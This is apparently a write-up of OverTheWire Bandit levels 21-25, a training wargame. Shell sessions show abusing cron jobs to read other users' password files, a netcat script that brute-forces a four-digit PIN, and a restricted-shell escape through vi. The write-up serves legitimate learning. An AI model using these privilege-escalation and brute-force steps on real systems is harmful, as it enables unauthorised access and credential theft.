OverTheWire Bandit Levels 21-25

Level 21

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ ssh bandit22@localhost
bandit22@localhost's password:

Level 22

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
<PASSWORD>
bandit22@bandit:~$ ssh bandit23@localhost
bandit23@localhost's password:

Level 23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done
bandit23@bandit:~$ cd /tmp/scottctaylor12
bandit23@bandit:/tmp/scottctaylor12$ touch bandit24-pass.sh
bandit23@bandit:/tmp/scottctaylor12$ chmod 777 bandit24-pass.sh
(WRITE SCRIPT)

bandit23@bandit:/tmp/scottctaylor12$ cat bandit24-pass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/scottctaylor12/PASSWORD
chmod 666 /tmp/scottctaylor12/PASSWORD
bandit23@bandit:/tmp/scottctaylor12$ cp bandit24-pass.sh /var/spool/bandit24/
bandit23@bandit:/tmp/scottctaylor12$ cat PASSWORD
<PASSWORD>
bandit23@bandit:/tmp/scottctaylor12$ ssh bandit24@localhost
bandit24@localhost's password:

Level 24

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@bandit:~$ cd /tmp/scottctaylor12
bandit24@bandit:/tmp/scottctaylor12$ touch brute-force-25.sh
bandit24@bandit:/tmp/scottctaylor12$ chmod 777 brute-force-25.sh
(EDIT brute-force-25.sh)
bandit24@bandit:/tmp/scottctaylor12$ cat brute-force-25.sh
#!/bin/bash
PASS=$(cat /etc/bandit_pass/bandit24)

for i in {0000..9999}
do
    echo $i
    echo $PASS $i | nc localhost 30002
done

bandit24@bandit:/tmp/scottctaylor12$ ./brute-force-25.sh >> output
(AN HOUR LATER.....)
bandit24@bandit:/tmp/scottctaylor12$ cat output | grep -i -A2 -B2 ^correct
5440
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is <PASSWORD>
bandit24@bandit:/tmp/scottctaylor12$ ssh bandit25@localhost
bandit24@localhost's password:

Level 25

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
..
Connection to localhost closed
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0
(SHRINK WINDOW TO SHOW 3 LINES)
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
:set shell=/bin/bash
:shell
bandit26@bandit:~$

Continue to OverTheWire Bandit Levels 26-30